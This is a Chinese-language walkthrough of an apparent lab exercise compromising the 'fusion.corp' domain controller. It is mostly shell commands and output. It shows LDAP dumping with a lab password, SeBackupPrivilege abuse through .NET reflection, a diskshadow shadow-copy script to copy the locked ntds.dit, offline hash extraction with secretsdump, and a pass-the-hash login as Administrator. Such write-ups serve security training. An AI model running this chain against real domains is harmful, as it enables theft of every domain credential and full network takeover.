文章总结: 本文详细记录了针对FusionCorp域控系统的内网渗透过程,通过nmap扫描发现域控制器Fusion-DC.fusion.corp,利用.NET反射技术激活SeBackupPrivilege权限,结合VSS卷影拷贝服务绕过文件独占锁机制,成功获取域控ntds.dit数据库文件。文档提供了完整的端口扫描结果、目录枚举信息和具体的技术操作步骤,展示了从信息收集到权限提升的完整攻击链。 综合评分: 85 文章分类: 内网渗透,红队,实战经验,安全工具,漏洞分析
域内横向
*Evil-WinRM* PS C:\Users\lparker\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
============== =============================================
fusion\lparker S-1-5-21-1898838421-3672757654-990739655-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Medium Plus Mandatory Level(中级+完整性级别),且属于 Remote Management Users。没有本地管理员权限。
网又断了,看来不是我的问题,接下来不用在意 IP 是什么,反正域控对就行
*Evil-WinRM* PS C:\Users\lparker\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest jmurphy
krbtgt lparker
The command completed with one or more errors.
尝试 Kerberoasting,为什么还要尝试Kerberoasting?
手中的账号通常只是一个普通域用户,在域内几乎没有特权。
- 服务账号的特殊性:很多服务(如 MSSQL、IIS、Exchange)在配置 SPN(服务主体名称)时,运行在域管理员或高权限组账号下。
- 目标:通过 Kerberoasting,你获取的是这些服务账号的加密 Hash。如果破解成功,你就能直接登录这些高权限账号,从而实现从普通用户到管理员的权限跨越。
Type "WHOAMI /?" for usage.*Evil-WinRM* PS C:\Users\lparker\Documents> setspn -T fusion.corp -Q */*
Checking domain DC=fusion,DC=corp
CN=FUSION-DC,OU=Domain Controllers,DC=fusion,DC=corp
TERMSRV/FUSION-DC
TERMSRV/Fusion-DC.fusion.corp
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/Fusion-DC.fusion.corp
ldap/Fusion-DC.fusion.corp/ForestDnsZones.fusion.corp
ldap/Fusion-DC.fusion.corp/DomainDnsZones.fusion.corp
DNS/Fusion-DC.fusion.corp
GC/Fusion-DC.fusion.corp/fusion.corp
RestrictedKrbHost/Fusion-DC.fusion.corp
RestrictedKrbHost/FUSION-DC
RPC/46637f26-9c61-4af6-b7a1-dd7055230d29._msdcs.fusion.corp
HOST/FUSION-DC/FUSION
HOST/Fusion-DC.fusion.corp/FUSION
HOST/FUSION-DC
HOST/Fusion-DC.fusion.corp
HOST/Fusion-DC.fusion.corp/fusion.corp
E3514235-4B06-11D1-AB04-00C04FC2DCD2/46637f26-9c61-4af6-b7a1-dd7055230d29/fusion.corp
ldap/FUSION-DC/FUSION
ldap/46637f26-9c61-4af6-b7a1-dd7055230d29._msdcs.fusion.corp
ldap/Fusion-DC.fusion.corp/FUSION
ldap/FUSION-DC
ldap/Fusion-DC.fusion.corp
ldap/Fusion-DC.fusion.corp/fusion.corp
CN=krbtgt,CN=Users,DC=fusion,DC=corp
kadmin/changepw
Existing SPN found!
*Evil-WinRM* PS C:\Users\lparker\Documents>
好吧,没有配置任何可供 Kerberoasting 攻击的用户账号
apple@macos ldapdomaindump % ldapdomaindump -u 'fusion.corp\lparker' -p '!!abbylvzsvs2k6!' --no-json --no-grep 10.145.150.244
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
apple@macos ldapdomaindump % ls
LICENSE domain_computers_by_os.html domain_users_by_group.html pyproject.toml
MANIFEST.in domain_groups.html help.txt requirements.txt
README.md domain_policy.html ldapdomaindump setup.py
build domain_trusts.html ldapdomaindump.egg-info
domain_computers.html domain_users.html ldapdomaindump.py
apple@macos ldapdomaindump % open .
apple@macos ldapdomaindump %
查看 LDAP Domain Dump
打开domain_users.html,发现jmurphy 的密码,同时注意
Remote Management Users (远程管理用户组)
此组的成员可以通过 Windows 远程管理(WinRM)协议访问该计算机。
Backup Operators (备份操作员组)
- SeBackupPrivilege (备份特权):允许用户读取文件系统上的任何文件,完全无视 NTFS 权限(即使文件设置了“仅限 Administrator 访问”,备份操作员也能读)。
- **SeRestorePrivilege (恢复特权)**:允许用户向系统写入任何文件,同样无视权限。
*Evil-WinRM* PS C:\Users\jmurphy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
~~可以开香槟~~~~🍾~~~~了(bushi)~~
拿下域控
1、利用磁盘阴影拷贝 (VSS)(失败)
*Evil-WinRM* PS C:\Users\jmurphy\Documents> ntdsutil "ac i ntds" "ifm" "create full c:\temp\ntds_bak" q q
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp\ntds_bak
Creating snapshot...
error 0x5(Access is denied.)
IFM media created successfully in c:\temp\ntds_bak
ifm: q
C:\Windows\system32\ntdsutil.exe: q
*Evil-WinRM* PS C:\Users\jmurphy\Documents>
2、利用 Robocopy 备份模式(失败)
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> robocopy /B C:\Windows\NTDS\ C:\Users\jmurphy\Desktop\ ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Sunday, May 10, 2026 9:01:15 AM
Source : C:\Windows\NTDS\
Dest : C:\Users\jmurphy\Desktop\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 C:\Windows\NTDS\
New File 16.0 m ntds.dit
2026/05/10 09:01:15 ERROR 0 (0x00000000) Copying File C:\Windows\NTDS\ntds.dit
The operation completed successfully.
3、孩子别怕,你SeBackupPrivilege 来了
SeBackupPrivilegeUtils.dll 和 SeBackupPrivilegeCmdLets.dll
Windows 合法后门、强行读取(或写入)任何文件、完全无视NTFS 权限。
下载链接:
****https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
# 创建一个文件夹存放
mkdir SeBackupPrivilege && cd SeBackupPrivilege
# 使用 curl 下载对应的 DLL (注意 URL 可能会随版本变化,建议去浏览器点一下)
curl -L -O https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll
curl -L -O https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll
# 在 Evil-WinRM 的 shell 里把文件丢上去
upload /你的本地路径/SeBackupPrivilegeCmdLets.dll
upload /你的本地路径/SeBackupPrivilegeUtils.dll
#运行
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
#1. 导出 SYSTEM 注册表(用于获取解密密钥):
reg save hklm\system C:\Users\jmurphy\Desktop\system.save
#2. 强行拷贝 NTDS.DIT(利用备份特权):
Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\Users\jmurphy\Desktop\ntds.dit -Overwrite
报错:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> reg save hklm\system C:\Users\jmurphy\Desktop\system.save
The operation completed successfully.
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\Users\jmurphy\Desktop\ntds.dit -Overwrite
Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\Users\jmurphy\ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege
遇到 0x80070020 (The process cannot access the file because it is being used by another process) 是非常经典的情况。在域控(DC)上,ntds.dit 数据库被 lsass.exe 独占锁定,即便你有 SeBackupPrivilege(备份权限),它也只能绕过 ACL(访问控制列表),却无法绕过 文件系统锁。
# 激活特权(这一步至关重要,否则后续 Copy 依然会报权限错误)
[bz.OneOEight.SeBackupPrivilege.Utils]::SetTokenPrivilege("SeBackupPrivilege")
报错:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [bz.OneOEight.SeBackupPrivilege.Utils]::SetTokenPrivilege("SeBackupPrivilege")
Unable to find type [bz.OneOEight.SeBackupPrivilege.Utils].
At line:1 char:1
+ [bz.OneOEight.SeBackupPrivilege.Utils]::SetTokenPrivilege("SeBackupPr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (bz.OneOEight.SeBackupPrivilege.Utils:TypeName) [], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound
使用反射强制加载 DLL,检查类型是否已加载,确认类型是否已经存在于当前会话:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [Reflection.Assembly]::LoadFile("C:\Users\jmurphy\Desktop\SeBackupPrivilegeUtils.dll")
GAC Version Location
--- ------- --------
False v2.0.50727 C:\Users\jmurphy\Desktop\SeBackupPrivilegeUtils.dll
直接调用类名:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.GetTypes() } | Where-Object { $_.FullName -like "*SeBackupPrivilege*" }
IsPublic IsSerial Name BaseType
-------- -------- ---- --------
True False SeBackupPrivilegeUtils System.Object
False True EFileAccess System.Enum
False True EFileShare System.Enum
False True ECreationDisposition System.Enum
False True EFileAttributes System.Enum
False True TOKEN_INFORMATION_CLASS System.Enum
False False TOKEN_PRIVILEGES System.ValueType
False False LUID_AND_ATTRIBUTES System.ValueType
False False LUID System.ValueType
False False TokPriv1Luid System.ValueType
True False FileUtils System.Object
True False Get_SeBackupPrivilege System.Management.Automation.Cmdlet
True False Set_SeBackupPrivige System.Management.Automation.Cmdlet
True False Copy_FileSeBackupPrivilege System.Management.Automation.PSCmdlet
不行从刚才加载的类型中直接调用:
Evil-WinRM* PS C:\Users\jmurphy\Desktop> $type = [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.GetTypes() } | Where-Object { $_.Name -eq "SeBackupPrivilegeUtils" }
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> $type::SetTokenPrivilege("SeBackupPrivilege")
Method invocation failed because [bz.OneOEight.SeBackupPrivilege.SeBackupPrivilegeUtils] does not contain a method named 'SetTokenPrivilege'.
At line:1 char:1
+ $type::SetTokenPrivilege("SeBackupPrivilege")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : MethodNotFound
还是不行,探测正确的方法名看看这个类到底提供了哪些静态方法:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> $type.GetMethods() | Where-Object { $_.Name -eq "setSeBackupPrivilege" } | ForEach-Object { $_.ToString() }
Boolean setSeBackupPrivilege(Boolean)
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> [bz.OneOEight.SeBackupPrivilege.SeBackupPrivilegeUtils]::setSeBackupPrivilege($true)
True
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> whoami /priv | findstr "SeBackupPrivilege"
SeBackupPrivilege Back up files and directories Enabled
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
方法名是 **setSeBackupPrivilege**
看上去 State 已经是 Enabled 了,这确实和刚才一样,但“权限开启”并不等于“锁被打开”。
接下来继续尝试创建卷影快照 down ntds.dit
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> $s1 = [WmiClass]"Win32_ShadowCopy"
Cannot convert value "Win32_ShadowCopy" to type "System.Management.ManagementClass". Error: "Access denied "
At line:1 char:1
+ $s1 = [WmiClass]"Win32_ShadowCopy"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvalidCastToWMIClass
说明尽管开启了 SeBackupPrivilege,但 WinRM 会话的 WMI 权限 被限制了。在域控上,即便你是管理员,直接通过 WMI 操作卷影拷贝有时也会受到过滤(特别是 UAC 远程限制)。
既然 WMI 被拦截了,我们换一种更底层、绕过 WMI 层的办法。既然你现在有 SeBackupPrivilege 且处于 Enabled 状态,我们可以尝试用 **diskshadow** 的“一句话脚本”模式,或者使用 **vssadmin**(虽然它通常用于查看,但在某些配置下可以创建)。
写入指令到脚本文件:
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> "set context persistent nowriters", "add volume c: alias temp_shadow", "create", "expose %temp_shadow% z:", "exit" | Out-File -FilePath script.txt -Encoding ascii
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: FUSION-DC, 5/10/2026 10:09:34 AM
-> set context persistent nowriters
-> add volume c: alias temp_shadow
-> create
The .cab metadata file cannot be stored in the current working directory, because it is read-only.
Use SET METADATA <metadata.cab> to specify an existing, writable directory.
*Evil-WinRM* PS C:\Users\jmurphy\Desktop>
这个报错是因为 diskshadow 在创建快照时,默认会尝试在当前目录下生成一个元数据文件(.cab),而由于正处于交互式的 Evil-WinRM 环境中,某些目录权限虽然显示可写,但对于 diskshadow 的服务进程来说可能存在写入限制。
没关系,手动指定一个 100% 具备写入权限的路径(比如 C:\Windows\Temp)来存放元数据即可。
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> "set context persistent nowriters", "set metadata C:\Windows\Temp\metadata.cab", "add volume c: alias temp_shadow", "create", "expose %temp_shadow% z:", "exit" | Out-File -FilePath script.txt -Encoding ascii
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: FUSION-DC, 5/10/2026 10:12:35 AM
-> set context persistent nowriters
-> set metadata C:\Windows\Temp\metadata.cab
-> add volume c: alias temp_shadow
-> create
Alias temp_shadow for shadow ID {f0111d20-3ae6-43bd-bd30-27f323d05c58} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {517547cb-67e1-45ca-99fa-51e11edad180} set as environment variable.
Querying all shadow copies with the shadow copy set ID {517547cb-67e1-45ca-99fa-51e11edad180}
* Shadow copy ID = {f0111d20-3ae6-43bd-bd30-27f323d05c58} %temp_shadow%
- Shadow copy set: {517547cb-67e1-45ca-99fa-51e11edad180} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{66a659a9-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 5/10/2026 10:12:36 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: Fusion-DC.fusion.corp
- Service machine: Fusion-DC.fusion.corp
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp_shadow% z:
-> %temp_shadow% = {f0111d20-3ae6-43bd-bd30-27f323d05c58}
The shadow copy was successfully exposed as z:\.
-> exit
快照已成功挂载到 **z:\**。现在 ntds.dit 在 z: 盘中是一个完全静止的副本,lsass.exe 的文件锁对它无效。
使用之前激活了 SeBackupPrivilege 的工具进行拷贝。此时源路径在 z: 盘。
执行特权拷贝
Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\Users\jmurphy\Desktop\ntds.dit -Overwrite
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> dir
Directory: C:\Users\jmurphy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2021 6:04 AM 37 flag.txt
-a---- 5/10/2026 10:15 AM 16777216 ntds.dit
-a---- 5/10/2026 10:10 AM 149 script.txt
-a---- 5/10/2026 9:43 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 5/10/2026 9:44 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 5/10/2026 9:44 AM 18075648 system.save
网又炸了,不过还好在坏之前我 down 下来了 ntds.dit
现在只需要提取 system.save。就可以了
apple@macos evil-winrm % ls -l
total 69640
-rw-r--r-- 1 apple staff 0 May 10 17:30 brew
-rw-r--r-- 1 apple staff 255 May 10 17:33 help.txt
-rw-r--r-- 1 apple staff 16777216 May 11 01:35 ntds.dit
-rw-r--r-- 1 apple staff 18075648 May 11 02:24 system.save
apple@macos evil-winrm % python ~/security/impacket/examples/secretsdump.py -ntds ntds.dit -system system.save LOCAL
Impacket v0.14.0.dev0+20260317.95020.1049826e - Copyright Fortra, LLC and its affiliated companies
apple@macos evil-winrm % evil-winrm -i 10.146.145.84 -u Administrator -H 9653xxxxxxxxx
Evil-WinRM shell v3.9
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd "C:/Users/Administrator/Desktop/"
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2021 6:05 AM 37 flag.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:皇后红队 Asuna Asuna《【内网渗透】通过.NET反射强行激活SeBackupPrivilege,并配合VSS卷影拷贝绕过独占锁,最终拿下域控ntds.dit。》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论